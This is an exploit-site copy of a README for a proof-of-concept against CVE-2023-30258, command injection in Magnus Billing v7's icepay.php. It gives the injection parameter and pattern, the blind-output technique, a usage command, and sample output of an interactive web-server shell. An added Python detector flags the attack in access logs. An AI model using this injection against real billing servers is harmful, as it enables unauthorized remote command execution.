## https://sploitus.com/exploit?id=3E76D0CB-4945-5258-BD7E-BD012EB17942
# CVE-2023-30258 — Magnus Billing v7 Command Injection (PoC)
> Unauthenticated command injection vulnerability in Magnus Billing v7.3.0. The `democ` GET parameter in `icepay.php` is passed directly to a shell function without sanitization, allowing arbitrary command execution as the web server user. The injection is blind — output is not reflected in the HTTP response — so this exploit redirects each command's output to a file in the webroot and fetches it back over HTTP.
---
## How it works
1. Sends a GET request to `/mbilling/lib/icepay/icepay.php?democ=;;`.
2. Redirects the command output to a file inside the webroot (`out.txt`).
3. Fetches the output file over HTTP and prints the result.
4. Cleans up the output file on exit.
> If the target uses a different webroot path, adjust `OUTPUT_FILE` at the top of the script.
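
The request pattern described above leaves a recognisable trace in web server access logs: a hit on `icepay.php` with shell metacharacters in `democ`, followed by the same client fetching the output file. The detector below is an added example, not part of the original PoC; it assumes Combined Log Format, the default output name `out.txt`, and constructed sample log lines that use a placeholder instead of a command.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Path and parameter come from the description above. OUTPUT_NAME is the PoC's
# default and can be changed by whoever runs it (assumption: left as out.txt).
VULN_PATH = "/lib/icepay/icepay.php"
PARAM = "democ"
OUTPUT_NAME = "out.txt"
SHELL_META = re.compile(r"[;|&`<>\n\r]|\$\(|\$\{")
# Combined Log Format: client, timestamp, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def democ_value(target):
    """Return the decoded democ value if the request hits icepay.php, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(VULN_PATH):
        return None
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == PARAM:
            return unquote_plus(value)
    return None

def scan(lines):
    """Yield (kind, client, timestamp, detail) findings in log order."""
    suspects = set()  # clients that already sent a suspicious democ value
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, _method, target, status = m.groups()
        value = democ_value(target)
        if value is not None and SHELL_META.search(value):
            suspects.add(client)
            yield ("injection", client, ts, value)
        elif client in suspects and urlsplit(target).path.endswith("/" + OUTPUT_NAME):
            yield ("output-fetch", client, ts, f"{target} -> {status}")

# Constructed sample lines (documentation address ranges, placeholder payload).
SAMPLE = [
    '198.51.100.4 - - [01/Jan/2025:09:59:10 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=demo HTTP/1.1" 200 12',
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=%3BPLACEHOLDER%3B HTTP/1.1" 200 0',
    '203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /mbilling/lib/icepay/out.txt HTTP/1.1" 200 54',
    '198.51.100.4 - - [01/Jan/2025:10:00:05 +0000] "GET /out.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep=" | ")
```

An `output-fetch` finding with status 200 shortly after an `injection` finding from the same client indicates the command ran and its output was retrieved.
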
## Requirements
- Python 3
- Install dependencies:
```bash
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
```
## Usage
```bash
python3 exploit.py -t http://TARGET
```
**Example:**
```
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data
```
## References
- [CVE-2023-30258](https://nvd.nist.gov/vuln/detail/CVE-2023-30258)
- [EDB-52170](https://www.exploit-db.com/exploits/52170)
- [Original PoC by Tinashe Matanda](https://github.com/tinashelorenzi/CVE-2023-30258-magnus-billing-v7-exploit)
## Credits
- **Discovery & original exploit:** Tinashe Matanda (SadNinja) / CodeSecLab
- **Cleanup & interactive shell:** [Esteban Zárate](https://github.com/estebanzarate)